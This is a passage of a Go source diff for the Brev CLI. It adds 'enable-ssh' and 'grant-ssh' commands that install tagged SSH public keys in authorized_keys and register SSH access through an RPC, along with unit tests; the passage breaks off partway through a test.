( + "context" + "fmt" + "os" + "os/exec" + "os/user" + "path/filepath" + "strings" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + + "github.com/brevdev/brev-cli/pkg/cmd/register" + "github.com/brevdev/brev-cli/pkg/config" + "github.com/brevdev/brev-cli/pkg/entity" + breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/terminal" + + "github.com/spf13/cobra" +) + +// EnableSSHStore defines the store methods needed by the enableSSH command. +type EnableSSHStore interface { + GetCurrentUser() (*entity.User, error) + GetBrevHomePath() (string, error) + GetAccessToken() (string, error) +} + +// PlatformChecker checks whether the current platform is supported. +type PlatformChecker interface { + IsCompatible() bool +} + +// NodeClientFactory creates ConnectRPC ExternalNodeService clients. +type NodeClientFactory interface { + NewNodeClient(provider register.TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient +} + +// enableSSHDeps bundles the side-effecting dependencies of runEnableSSH so they +// can be replaced in tests. +type enableSSHDeps struct { + platform PlatformChecker + nodeClients NodeClientFactory + registrationStore register.RegistrationStore +} + +func defaultEnableSSHDeps(brevHome string) enableSSHDeps { + return enableSSHDeps{ + platform: register.LinuxPlatform{}, + nodeClients: register.DefaultNodeClientFactory{}, + registrationStore: register.NewFileRegistrationStore(brevHome), + } +} + +func NewCmdEnableSSH(t *terminal.Terminal, store EnableSSHStore) *cobra.Command { + cmd := &cobra.Command{ + Annotations: map[string]string{"configuration": ""}, + Use: "enable-ssh", + DisableFlagsInUseLine: true, + Short: "Enable SSH access to this registered device", + Long: "Enable SSH access to this registered device for the current Brev user.", + Example: " brev enable-ssh", + RunE: func(cmd *cobra.Command, args []string) error { + brevHome, err := store.GetBrevHomePath() + if err != nil { + return breverrors.WrapAndTrace(err) + } + return runEnableSSH(cmd.Context(), t, store, defaultEnableSSHDeps(brevHome)) + }, + } + + return cmd +} + +func runEnableSSH(ctx context.Context, t *terminal.Terminal, s EnableSSHStore, deps enableSSHDeps) error { + if !deps.platform.IsCompatible() { + return fmt.Errorf("brev enable-ssh is only supported on Linux") + } + + registered, err := deps.registrationStore.Exists() + if err != nil { + return breverrors.WrapAndTrace(err) + } + if !registered { + return fmt.Errorf("no registration found; this machine does not appear to be registered\nRun 'brev register' to register your device first") + } + + reg, err := deps.registrationStore.Load() + if err != nil { + return fmt.Errorf("failed to read registration file: %w", err) + } + + brevUser, err := s.GetCurrentUser() + if err != nil { + return breverrors.WrapAndTrace(err) + } + + return EnableSSH(ctx, t, deps.nodeClients, s, reg, brevUser) +} + +// EnableSSH grants SSH access to the given node for the specified Brev user. +// It is exported so that the register command can reuse it after registration. +func EnableSSH( + ctx context.Context, + t *terminal.Terminal, + nodeClients NodeClientFactory, + tokenProvider register.TokenProvider, + reg *register.DeviceRegistration, + brevUser *entity.User, +) error { + u, err := user.Current() + if err != nil { + return fmt.Errorf("failed to determine current Linux user: %w", err) + } + linuxUser := u.Username + + checkSSHDaemon(t) + + t.Vprint("") + t.Vprint(t.Green("Enabling SSH access on this device")) + t.Vprint("") + t.Vprintf(" Node: %s (%s)\n", reg.DisplayName, reg.ExternalNodeID) + t.Vprintf(" Brev user: %s\n", brevUser.ID) + t.Vprintf(" Linux user: %s\n", linuxUser) + t.Vprint("") + + if brevUser.PublicKey != "" { + if err := InstallAuthorizedKey(u, brevUser.PublicKey); err != nil { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) + } else { + t.Vprint(" Brev public key added to authorized_keys.") + } + } + + client := nodeClients.NewNodeClient(tokenProvider, config.GlobalConfig.GetBrevPublicAPIURL()) + if _, err := client.GrantNodeSSHAccess(ctx, connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ + ExternalNodeId: reg.ExternalNodeID, + UserId: brevUser.ID, + LinuxUser: linuxUser, + })); err != nil { + return fmt.Errorf("failed to enable SSH access: %w", err) + } + + t.Vprint(t.Green(fmt.Sprintf("SSH access enabled. You can now SSH to this device via: brev shell %s", reg.DisplayName))) + return nil +} + +// BrevKeyComment is the marker appended to every SSH key that Brev installs. +// It allows RemoveBrevAuthorizedKeys to identify and remove exactly those keys. +const BrevKeyComment = "# brev-cli" + +// InstallAuthorizedKey appends the given public key to the user's +// ~/.ssh/authorized_keys if it isn't already present. The key is tagged with +// a brev-cli comment so it can be removed later by RemoveBrevAuthorizedKeys. +func InstallAuthorizedKey(u *user.User, pubKey string) error { + pubKey = strings.TrimSpace(pubKey) + if pubKey == "" { + return nil + } + + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + return fmt.Errorf("creating .ssh directory: %w", err) + } + + authKeysPath := filepath.Join(sshDir, "authorized_keys") + + existing, err := os.ReadFile(authKeysPath) // #nosec G304 + if err != nil && !os.IsNotExist(err) { + return fmt.Errorf("reading authorized_keys: %w", err) + } + + if strings.Contains(string(existing), pubKey) { + return nil // already present (tagged or not) + } + + taggedKey := pubKey + " " + BrevKeyComment + + // Ensure existing content ends with a newline before appending. + content := string(existing) + if len(content) > 0 && !strings.HasSuffix(content, "\n") { + content += "\n" + } + content += taggedKey + "\n" + + if err := os.WriteFile(authKeysPath, []byte(content), 0o600); err != nil { + return fmt.Errorf("writing authorized_keys: %w", err) + } + + return nil +} + +// RemoveBrevAuthorizedKeys removes all SSH keys tagged with the brev-cli +// comment from the user's ~/.ssh/authorized_keys. +func RemoveBrevAuthorizedKeys(u *user.User) error { + authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") + + existing, err := os.ReadFile(authKeysPath) // #nosec G304 + if err != nil { + if os.IsNotExist(err) { + return nil + } + return fmt.Errorf("reading authorized_keys: %w", err) + } + + var kept []string + for _, line := range strings.Split(string(existing), "\n") { + if strings.Contains(line, BrevKeyComment) { + continue + } + kept = append(kept, line) + } + + result := strings.Join(kept, "\n") + if err := os.WriteFile(authKeysPath, []byte(result), 0o600); err != nil { + return fmt.Errorf("writing authorized_keys: %w", err) + } + return nil +} + +// checkSSHDaemon prints a warning if neither "ssh" nor "sshd" systemd services +// appear to be active. It never returns an error — it is best-effort. +func checkSSHDaemon(t *terminal.Terminal) { + for _, svc := range []string{"ssh", "sshd"} { + out, err := exec.Command("systemctl", "is-active", svc).Output() //nolint:gosec // fixed service names + if err == nil && len(out) > 0 && string(out[:len(out)-1]) == "active" { + return + } + } + t.Vprintf(" %s\n", t.Yellow("Warning: SSH daemon does not appear to be running. SSH access may not work until sshd is started.")) +} diff --git a/pkg/cmd/enablessh/enablessh_test.go b/pkg/cmd/enablessh/enablessh_test.go new file mode 100644 index 000000000..d4edb138a --- /dev/null +++ b/pkg/cmd/enablessh/enablessh_test.go @@ -0,0 +1,240 @@ +package enablessh + +import ( + "os" + "os/user" + "path/filepath" + "strings" + "testing" +) + +// tempUser returns a *user.User whose HomeDir points to a temporary directory. +func tempUser(t *testing.T) *user.User { + t.Helper() + return &user.User{HomeDir: t.TempDir()} +} + +// readAuthorizedKeys is a test helper that reads ~/.ssh/authorized_keys. +func readAuthorizedKeys(t *testing.T, u *user.User) string { + t.Helper() + data, err := os.ReadFile(filepath.Join(u.HomeDir, ".ssh", "authorized_keys")) + if err != nil { + t.Fatalf("reading authorized_keys: %v", err) + } + return string(data) +} + +// --- InstallAuthorizedKey --- + +func Test_InstallAuthorizedKey_TagsKeyWithBrevComment(t *testing.T) { + u := tempUser(t) + + if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + t.Fatalf("InstallAuthorizedKey: %v", err) + } + + content := readAuthorizedKeys(t, u) + if !strings.Contains(content, "ssh-rsa AAAA testkey "+BrevKeyComment) { + t.Errorf("expected key tagged with %q, got:\n%s", BrevKeyComment, content) + } +} + +func Test_InstallAuthorizedKey_SkipsDuplicate(t *testing.T) { + u := tempUser(t) + + if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + t.Fatalf("first install: %v", err) + } + if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + t.Fatalf("second install: %v", err) + } + + content := readAuthorizedKeys(t, u) + count := strings.Count(content, "ssh-rsa AAAA testkey") + if count != 1 { + t.Errorf("expected key to appear once, appeared %d times:\n%s", count, content) + } +} + +func Test_InstallAuthorizedKey_SkipsDuplicateEvenIfAlreadyTagged(t *testing.T) { + u := tempUser(t) + + // Pre-seed a tagged key (as if brev already installed it). + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte("ssh-rsa AAAA testkey "+BrevKeyComment+"\n"), 0o600); err != nil { + t.Fatal(err) + } + + if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + t.Fatalf("InstallAuthorizedKey: %v", err) + } + + content := readAuthorizedKeys(t, u) + count := strings.Count(content, "ssh-rsa AAAA testkey") + if count != 1 { + t.Errorf("expected key to appear once, appeared %d times:\n%s", count, content) + } +} + +func Test_InstallAuthorizedKey_EmptyKeyIsNoop(t *testing.T) { + u := tempUser(t) + + if err := InstallAuthorizedKey(u, ""); err != nil { + t.Fatalf("InstallAuthorizedKey: %v", err) + } + if err := InstallAuthorizedKey(u, " "); err != nil { + t.Fatalf("InstallAuthorizedKey (whitespace): %v", err) + } + + // authorized_keys should not exist since nothing was written. + path := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") + if _, err := os.Stat(path); !os.IsNotExist(err) { + t.Errorf("expected authorized_keys to not exist, but it does") + } +} + +func Test_InstallAuthorizedKey_CreatesSSHDir(t *testing.T) { + u := tempUser(t) + + if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + t.Fatalf("InstallAuthorizedKey: %v", err) + } + + info, err := os.Stat(filepath.Join(u.HomeDir, ".ssh")) + if err != nil { + t.Fatalf("stat .ssh: %v", err) + } + if !info.IsDir() { + t.Error(".ssh is not a directory") + } +} + +func Test_InstallAuthorizedKey_PreservesExistingKeys(t *testing.T) { + u := tempUser(t) + + // Pre-seed a non-brev key. + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte("ssh-rsa EXISTING user@host\n"), 0o600); err != nil { + t.Fatal(err) + } + + if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + t.Fatalf("InstallAuthorizedKey: %v", err) + } + + content := readAuthorizedKeys(t, u) + if !strings.Contains(content, "ssh-rsa EXISTING user@host") { + t.Errorf("existing key was lost:\n%s", content) + } + if !strings.Contains(content, "ssh-rsa AAAA testkey "+BrevKeyComment) { + t.Errorf("new key not found:\n%s", content) + } +} + +// --- RemoveBrevAuthorizedKeys --- + +func Test_RemoveBrevAuthorizedKeys_RemovesTaggedKeys(t *testing.T) { + u := tempUser(t) + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + + content := strings.Join([]string{ + "ssh-rsa EXISTING user@host", + "ssh-rsa BREVKEY1 " + BrevKeyComment, + "ssh-ed25519 OTHERKEY admin@server", + "ssh-rsa BREVKEY2 " + BrevKeyComment, + "", + }, "\n") + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte(content), 0o600); err != nil { + t.Fatal(err) + } + + if err := RemoveBrevAuthorizedKeys(u); err != nil { + t.Fatalf("RemoveBrevAuthorizedKeys: %v", err) + } + + result := readAuthorizedKeys(t, u) + if strings.Contains(result, BrevKeyComment) { + t.Errorf("brev keys still present:\n%s", result) + } + if !strings.Contains(result, "ssh-rsa EXISTING user@host") { + t.Errorf("non-brev key was removed:\n%s", result) + } + if !strings.Contains(result, "ssh-ed25519 OTHERKEY admin@server") { + t.Errorf("non-brev key was removed:\n%s", result) + } +} + +func Test_RemoveBrevAuthorizedKeys_NoopWhenFileDoesNotExist(t *testing.T) { + u := tempUser(t) + + if err := RemoveBrevAuthorizedKeys(u); err != nil { + t.Fatalf("expected no error for missing file, got: %v", err) + } +} + +func Test_RemoveBrevAuthorizedKeys_NoopWhenNoBrevKeys(t *testing.T) { + u := tempUser(t) + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + + original := "ssh-rsa EXISTING user@host\nssh-ed25519 OTHER admin@server\n" + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte(original), 0o600); err != nil { + t.Fatal(err) + } + + if err := RemoveBrevAuthorizedKeys(u); err != nil { + t.Fatalf("RemoveBrevAuthorizedKeys: %v", err) + } + + result := readAuthorizedKeys(t, u) + if result != original { + t.Errorf("file was modified when it shouldn't have been.\nwant:\n%s\ngot:\n%s", original, result) + } +} + +// --- Round-trip: install then remove --- + +func Test_InstallThenRemove_RoundTrip(t *testing.T) { + u := tempUser(t) + + // Pre-seed a non-brev key. + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatal(err) + } + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte("ssh-rsa EXISTING user@host\n"), 0o600); err != nil { + t.Fatal(err) + } + + // Install two brev keys. + if err := InstallAuthorizedKey(u, "ssh-rsa KEY1"); err != nil { + t.Fatal(err) + } + if err := InstallAuthorizedKey(u, "ssh-rsa KEY2"); err != nil { + t.Fatal(err) + } + + // Remove all brev keys. + if err := RemoveBrevAuthorizedKeys(u); err != nil { + t.Fatal(err) + } + + result := readAuthorizedKeys(t, u) + if strings.Contains(result, BrevKeyComment) { + t.Errorf("brev keys still present after removal:\n%s", result) + } + if !strings.Contains(result, "ssh-rsa EXISTING user@host") { + t.Errorf("non-brev key was removed:\n%s", result) + } +} diff --git a/pkg/cmd/grantssh/grantssh.go b/pkg/cmd/grantssh/grantssh.go new file mode 100644 index 000000000..7dc581874 --- /dev/null +++ b/pkg/cmd/grantssh/grantssh.go @@ -0,0 +1,255 @@ +// Package grantssh provides the brev grant-ssh command for granting SSH access +// to a registered device for another org member. +package grantssh + +import ( + "context" + "fmt" + "os" + "os/user" + "path/filepath" + "strings" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + + "github.com/brevdev/brev-cli/pkg/cmd/enablessh" + "github.com/brevdev/brev-cli/pkg/cmd/register" + "github.com/brevdev/brev-cli/pkg/config" + "github.com/brevdev/brev-cli/pkg/entity" + breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/terminal" + + "github.com/spf13/cobra" +) + +// GrantSSHStore defines the store methods needed by the grant-ssh command. +type GrantSSHStore interface { + GetCurrentUser() (*entity.User, error) + GetActiveOrganizationOrDefault() (*entity.Organization, error) + GetBrevHomePath() (string, error) + GetAccessToken() (string, error) + GetOrgRoleAttachments(orgID string) ([]entity.OrgRoleAttachment, error) + GetUserByID(userID string) (*entity.User, error) +} + +// PlatformChecker checks whether the current platform is supported. +type PlatformChecker interface { + IsCompatible() bool +} + +// Selector prompts the user to choose from a list of items. +type Selector interface { + Select(label string, items []string) string +} + +// NodeClientFactory creates ConnectRPC ExternalNodeService clients. +type NodeClientFactory interface { + NewNodeClient(provider register.TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient +} + +// grantSSHDeps bundles the side-effecting dependencies of runGrantSSH so they +// can be replaced in tests. +type grantSSHDeps struct { + platform PlatformChecker + prompter Selector + nodeClients NodeClientFactory + registrationStore register.RegistrationStore +} + +type resolvedMember struct { + user *entity.User + attachment entity.OrgRoleAttachment +} + +func defaultGrantSSHDeps(brevHome string) grantSSHDeps { + return grantSSHDeps{ + platform: register.LinuxPlatform{}, + prompter: register.TerminalPrompter{}, + nodeClients: register.DefaultNodeClientFactory{}, + registrationStore: register.NewFileRegistrationStore(brevHome), + } +} + +func NewCmdGrantSSH(t *terminal.Terminal, store GrantSSHStore) *cobra.Command { + cmd := &cobra.Command{ + Annotations: map[string]string{"configuration": ""}, + Use: "grant-ssh", + DisableFlagsInUseLine: true, + Short: "Grant SSH access to this device for another org member", + Long: "Grant SSH access to this registered device for another member of your organization.", + Example: " brev grant-ssh", + RunE: func(cmd *cobra.Command, args []string) error { + brevHome, err := store.GetBrevHomePath() + if err != nil { + return breverrors.WrapAndTrace(err) + } + return runGrantSSH(cmd.Context(), t, store, defaultGrantSSHDeps(brevHome)) + }, + } + + return cmd +} + +func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, deps grantSSHDeps) error { //nolint:funlen // grant-ssh flow + if !deps.platform.IsCompatible() { + return fmt.Errorf("brev grant-ssh is only supported on Linux") + } + + reg, err := getRegistration(deps) + if err != nil { + return breverrors.WrapAndTrace(err) + } + + currentUser, err := s.GetCurrentUser() + if err != nil { + return breverrors.WrapAndTrace(err) + } + + if err := checkSSHEnabled(currentUser.PublicKey); err != nil { + return err + } + + u, err := user.Current() + if err != nil { + return fmt.Errorf("failed to determine current Linux user: %w", err) + } + linuxUser := u.Username + + org, err := s.GetActiveOrganizationOrDefault() + if err != nil { + return breverrors.WrapAndTrace(err) + } + if org == nil { + return fmt.Errorf("no organization found; please create or join an organization first") + } + + orgMembers, err := getOrgMembers(currentUser, t, s, org.ID) + // Resolve user details for each member. + if err != nil { + return breverrors.WrapAndTrace(err) + } + + // Build selection list. + items := make([]string, len(orgMembers)) + for i, r := range orgMembers { + items[i] = fmt.Sprintf("%s (%s)", r.user.Name, r.user.Email) + } + + selected := deps.prompter.Select("Select a user to grant SSH access:", items) + + // Find the selected user. + var selectedIdx int + for i, item := range items { + if item == selected { + selectedIdx = i + break + } + } + selectedUser := orgMembers[selectedIdx].user + + t.Vprint("") + t.Vprint(t.Green("Granting SSH access")) + t.Vprint("") + t.Vprintf(" Node: %s (%s)\n", reg.DisplayName, reg.ExternalNodeID) + t.Vprintf(" Brev user: %s (%s)\n", selectedUser.Name, selectedUser.ID) + t.Vprintf(" Linux user: %s\n", linuxUser) + t.Vprint("") + + if selectedUser.PublicKey != "" { + if err := enablessh.InstallAuthorizedKey(u, selectedUser.PublicKey); err != nil { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) + } else { + t.Vprint(" Brev public key added to authorized_keys.") + } + } + + client := deps.nodeClients.NewNodeClient(s, config.GlobalConfig.GetBrevPublicAPIURL()) + if _, err := client.GrantNodeSSHAccess(ctx, connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ + ExternalNodeId: reg.ExternalNodeID, + UserId: selectedUser.ID, + LinuxUser: linuxUser, + })); err != nil { + return fmt.Errorf("failed to grant SSH access: %w", err) + } + + t.Vprint(t.Green(fmt.Sprintf("SSH access granted for %s. They can now SSH to this device via: brev shell %s", selectedUser.Name, reg.DisplayName))) + return nil +} + +func getOrgMembers(currentUser *entity.User, t *terminal.Terminal, s GrantSSHStore, orgId string) ([]resolvedMember, error) { + attachments, err := s.GetOrgRoleAttachments(orgId) + if err != nil { + return nil, fmt.Errorf("failed to fetch org members: %w", err) + } + + // Filter out current user. + var otherMembers []entity.OrgRoleAttachment + for _, a := range attachments { + if a.Subject != currentUser.ID { + otherMembers = append(otherMembers, a) + } + } + + if len(otherMembers) == 0 { + return nil, fmt.Errorf("no other members found in current organization") + } + var resolved []resolvedMember + for _, m := range otherMembers { + memberUser, err := s.GetUserByID(m.Subject) + if err != nil { + t.Vprintf(" Warning: could not resolve user %s: %v\n", m.Subject, err) + continue + } + resolved = append(resolved, resolvedMember{user: memberUser, attachment: m}) + } + + if len(resolved) == 0 { + return nil, fmt.Errorf("could not resolve any org member details") + } + + return resolved, nil +} + +func getRegistration(deps grantSSHDeps) (*register.DeviceRegistration, error) { + registered, err := deps.registrationStore.Exists() + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + if !registered { + return nil, fmt.Errorf("no registration found; this machine does not appear to be registered\nRun 'brev register' to register your device first") + } + + reg, err := deps.registrationStore.Load() + if err != nil { + return nil, fmt.Errorf("failed to read registration file: %w", err) + } + return reg, nil +} + +// checkSSHEnabled verifies that SSH has been enabled on this device by checking +// if the current user's public key is present in authorized_keys. +func checkSSHEnabled(currentUserPubKey string) error { + currentUserPubKey = strings.TrimSpace(currentUserPubKey) + if currentUserPubKey == "" { + return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + } + + u, err := user.Current() + if err != nil { + return fmt.Errorf("failed to determine current Linux user: %w", err) + } + + authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") + existing, err := os.ReadFile(authKeysPath) // #nosec G304 + if err != nil { + return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + } + + if !strings.Contains(string(existing), currentUserPubKey) { + return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + } + + return nil +} diff --git a/pkg/cmd/grantssh/grantssh_test.go b/pkg/cmd/grantssh/grantssh_test.go new file mode 100644 index 000000000..639a499cd --- /dev/null +++ b/pkg/cmd/grantssh/grantssh_test.go @@ -0,0 +1,365 @@ +package grantssh + +import ( + "context" + "fmt" + "net/http/httptest" + "os" + "os/user" + "path/filepath" + "strings" + "testing" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + + "github.com/brevdev/brev-cli/pkg/cmd/register" + "github.com/brevdev/brev-cli/pkg/entity" + "github.com/brevdev/brev-cli/pkg/terminal" +) + +// mock types for grantSSHDeps interfaces + +type mockPlatform struct{ compatible bool } + +func (m mockPlatform) IsCompatible() bool { return m.compatible } + +type mockSelector struct { + fn func(label string, items []string) string +} + +func (m mockSelector) Select(label string, items []string) string { + return m.fn(label, items) +} + +type mockNodeClientFactory struct { + serverURL string +} + +func (m mockNodeClientFactory) NewNodeClient(provider register.TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { + return register.NewNodeServiceClient(provider, m.serverURL) +} + +// mockRegistrationStore satisfies register.RegistrationStore. +type mockRegistrationStore struct { + reg *register.DeviceRegistration +} + +func (m *mockRegistrationStore) Save(reg *register.DeviceRegistration) error { + m.reg = reg + return nil +} + +func (m *mockRegistrationStore) Load() (*register.DeviceRegistration, error) { + if m.reg == nil { + return nil, fmt.Errorf("no registration") + } + return m.reg, nil +} + +func (m *mockRegistrationStore) Delete() error { + m.reg = nil + return nil +} + +func (m *mockRegistrationStore) Exists() (bool, error) { + return m.reg != nil, nil +} + +// mockGrantSSHStore satisfies GrantSSHStore. +type mockGrantSSHStore struct { + user *entity.User + org *entity.Organization + home string + token string + attachments []entity.OrgRoleAttachment + users map[string]*entity.User + err error +} + +func (m *mockGrantSSHStore) GetCurrentUser() (*entity.User, error) { + if m.err != nil { + return nil, m.err + } + return m.user, nil +} + +func (m *mockGrantSSHStore) GetActiveOrganizationOrDefault() (*entity.Organization, error) { + return m.org, nil +} + +func (m *mockGrantSSHStore) GetBrevHomePath() (string, error) { return m.home, nil } +func (m *mockGrantSSHStore) GetAccessToken() (string, error) { return m.token, nil } + +func (m *mockGrantSSHStore) GetOrgRoleAttachments(_ string) ([]entity.OrgRoleAttachment, error) { + return m.attachments, nil +} + +func (m *mockGrantSSHStore) GetUserByID(userID string) (*entity.User, error) { + u, ok := m.users[userID] + if !ok { + return nil, fmt.Errorf("user %s not found", userID) + } + return u, nil +} + +// fakeNodeService implements the server side of ExternalNodeService for testing. +type fakeNodeService struct { + nodev1connect.UnimplementedExternalNodeServiceHandler + grantSSHFn func(*nodev1.GrantNodeSSHAccessRequest) (*nodev1.GrantNodeSSHAccessResponse, error) +} + +func (f *fakeNodeService) GrantNodeSSHAccess(_ context.Context, req *connect.Request[nodev1.GrantNodeSSHAccessRequest]) (*connect.Response[nodev1.GrantNodeSSHAccessResponse], error) { + resp, err := f.grantSSHFn(req.Msg) + if err != nil { + return nil, err + } + return connect.NewResponse(resp), nil +} + +// authorizedKeysPath returns the path to the current user's authorized_keys file. +func authorizedKeysPath(t *testing.T) string { + t.Helper() + u, err := user.Current() + if err != nil { + t.Fatalf("user.Current: %v", err) + } + return filepath.Join(u.HomeDir, ".ssh", "authorized_keys") +} + +// installTestAuthorizedKey writes a pubkey to the current user's +// ~/.ssh/authorized_keys so that checkSSHEnabled passes. +func installTestAuthorizedKey(t *testing.T, pubKey string) { + t.Helper() + authKeysPath := authorizedKeysPath(t) + sshDir := filepath.Dir(authKeysPath) + + if err := os.MkdirAll(sshDir, 0o700); err != nil { + t.Fatalf("mkdir .ssh: %v", err) + } + + existing, _ := os.ReadFile(authKeysPath) // #nosec G304 + content := string(existing) + pubKey + "\n" + if err := os.WriteFile(authKeysPath, []byte(content), 0o600); err != nil { + t.Fatalf("write authorized_keys: %v", err) + } +} + +// cleanupSSHKey removes the given pubkey from authorized_keys, restoring the +// file to its previous state. +func cleanupSSHKey(t *testing.T, pubKey string) { + t.Helper() + path := authorizedKeysPath(t) + data, err := os.ReadFile(path) // #nosec G304 + if err != nil { + return // nothing to clean up + } + var kept []string + for _, line := range strings.Split(string(data), "\n") { + if line != pubKey { + kept = append(kept, line) + } + } + os.WriteFile(path, []byte(strings.Join(kept, "\n")), 0o600) //nolint:errcheck // best-effort cleanup +} + +func testGrantSSHDeps(t *testing.T, svc *fakeNodeService, regStore register.RegistrationStore) (grantSSHDeps, *httptest.Server) { + t.Helper() + + _, handler := nodev1connect.NewExternalNodeServiceHandler(svc) + server := httptest.NewServer(handler) + + return grantSSHDeps{ + platform: mockPlatform{compatible: true}, + prompter: mockSelector{fn: func(_ string, items []string) string { + if len(items) > 0 { + return items[0] + } + return "" + }}, + nodeClients: mockNodeClientFactory{serverURL: server.URL}, + registrationStore: regStore, + }, server +} + +func Test_runGrantSSH_NotCompatible(t *testing.T) { + regStore := &mockRegistrationStore{} + store := &mockGrantSSHStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{} + deps, server := testGrantSSHDeps(t, svc, regStore) + defer server.Close() + + deps.platform = mockPlatform{compatible: false} + + term := terminal.New() + err := runGrantSSH(context.Background(), term, store, deps) + if err == nil { + t.Fatal("expected error for incompatible platform") + } +} + +func Test_runGrantSSH_NotRegistered(t *testing.T) { + regStore := &mockRegistrationStore{} // no registration + + store := &mockGrantSSHStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{} + deps, server := testGrantSSHDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runGrantSSH(context.Background(), term, store, deps) + if err == nil { + t.Fatal("expected error when not registered") + } +} + +func Test_runGrantSSH_HappyPath(t *testing.T) { + pubKey := "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAITestKey test@brev" + installTestAuthorizedKey(t, pubKey) + defer cleanupSSHKey(t, pubKey) + + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + DeviceID: "dev-uuid", + }, + } + + targetUser := &entity.User{ + ID: "user_2", + Name: "Alice", + Email: "alice@example.com", + PublicKey: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAliceKey alice@brev", + } + + store := &mockGrantSSHStore{ + user: &entity.User{ID: "user_1", PublicKey: pubKey}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + attachments: []entity.OrgRoleAttachment{ + {Subject: "user_1"}, // current user, should be filtered + {Subject: "user_2"}, + }, + users: map[string]*entity.User{ + "user_2": targetUser, + }, + } + + var gotReq *nodev1.GrantNodeSSHAccessRequest + svc := &fakeNodeService{ + grantSSHFn: func(req *nodev1.GrantNodeSSHAccessRequest) (*nodev1.GrantNodeSSHAccessResponse, error) { + gotReq = req + return &nodev1.GrantNodeSSHAccessResponse{}, nil + }, + } + + deps, server := testGrantSSHDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runGrantSSH(context.Background(), term, store, deps) + if err != nil { + t.Fatalf("runGrantSSH failed: %v", err) + } + + if gotReq == nil { + t.Fatal("expected GrantNodeSSHAccess to be called") + } + if gotReq.GetExternalNodeId() != "unode_abc" { + t.Errorf("expected node ID unode_abc, got %s", gotReq.GetExternalNodeId()) + } + if gotReq.GetUserId() != "user_2" { + t.Errorf("expected user ID user_2, got %s", gotReq.GetUserId()) + } +} + +func Test_runGrantSSH_RPCFailure(t *testing.T) { + pubKey := "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAITestKey2 test@brev" + installTestAuthorizedKey(t, pubKey) + defer cleanupSSHKey(t, pubKey) + + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + }, + } + + store := &mockGrantSSHStore{ + user: &entity.User{ID: "user_1", PublicKey: pubKey}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + attachments: []entity.OrgRoleAttachment{ + {Subject: "user_2"}, + }, + users: map[string]*entity.User{ + "user_2": {ID: "user_2", Name: "Alice", Email: "alice@example.com"}, + 